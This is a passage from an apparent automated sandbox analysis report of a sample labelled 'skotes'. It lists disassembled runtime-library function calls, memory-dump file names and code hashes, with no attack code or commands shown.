                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00497936
                                                                                                                                                                                                                                                    • Part of subcall function 00495CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00495D70
                                                                                                                                                                                                                                                    • Part of subcall function 00495CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00495D7E
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00497982
                                                                                                                                                                                                                                                  • Concurrency::location::_Assign.LIBCMT ref: 004979A3
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 004979AB
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 004979BD
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 004979ED
                                                                                                                                                                                                                                                    • Part of subcall function 0049691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00496942
                                                                                                                                                                                                                                                    • Part of subcall function 0049691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00496965
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1475861073-0
                                                                                                                                                                                                                                                  • Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                                                                                                                                  • Instruction ID: 45ac183bf00d05d564944c5346acc6c7e9c501f4c8e663610270006cfb9e6425
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D31E370B182556EEF16AA7844927FF7FA5DF41304F0401BBD485D7342DA2C4D4AC795
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 004B4C98
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 004B4D5E
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 004B4DCA
                                                                                                                                                                                                                                                    • Part of subcall function 004AB04B: RtlAllocateHeap.NTDLL(00000000,A02F68A0,?,?,0048D3FC,A02F68A0,?,00487A8B,?,?,?,?,?,?,00477465,?), ref: 004AB07E
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 004B4DD3
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 004B4DF6
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                  • String ID: ZJ,mJ
                                                                                                                                                                                                                                                  • API String ID: 1423051803-3561173285
                                                                                                                                                                                                                                                  • Opcode ID: 0187a8e14d6cdf16d383f55f2561d8f122b2509fda4c5a147f50ba85f48345cf
                                                                                                                                                                                                                                                  • Instruction ID: 2daf2be3788aa2d5f20ce2d886d4ec6b72472bd90507766d873b0aae563217c3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0187a8e14d6cdf16d383f55f2561d8f122b2509fda4c5a147f50ba85f48345cf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C51DF72600206AFEB219E658C41FFB3BADDBD1714F15062BFD04A7242EB38DC1196B8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 0049DD91
                                                                                                                                                                                                                                                  • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 0049DDAE
                                                                                                                                                                                                                                                  • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 0049DE14
                                                                                                                                                                                                                                                  • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 0049DE29
                                                                                                                                                                                                                                                  • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 0049DE3B
                                                                                                                                                                                                                                                  • Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 0049DE4B
                                                                                                                                                                                                                                                  • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 0049DE74
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2885714658-0
                                                                                                                                                                                                                                                  • Opcode ID: 5cb09d8b3373d9789687c471cba0348db22ef5a0a8b9167adbdebdc7a59a9fad
                                                                                                                                                                                                                                                  • Instruction ID: 9d6b8a562438359ce8f506f028d1029e85add3053ee4e40a6adf302c85dff9a3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cb09d8b3373d9789687c471cba0348db22ef5a0a8b9167adbdebdc7a59a9fad
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09418930E046449ADF15FBA585567AE7FA16F11308F1444BFE8456B3C3CB2C8E09CB6A
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0049E7D7
                                                                                                                                                                                                                                                    • Part of subcall function 0049E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0049E577
                                                                                                                                                                                                                                                    • Part of subcall function 0049E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0049E599
                                                                                                                                                                                                                                                  • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0049E854
                                                                                                                                                                                                                                                  • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0049E860
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0049E86F
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0049E879
                                                                                                                                                                                                                                                  • Concurrency::location::_Assign.LIBCMT ref: 0049E8AD
                                                                                                                                                                                                                                                  • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0049E8B5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
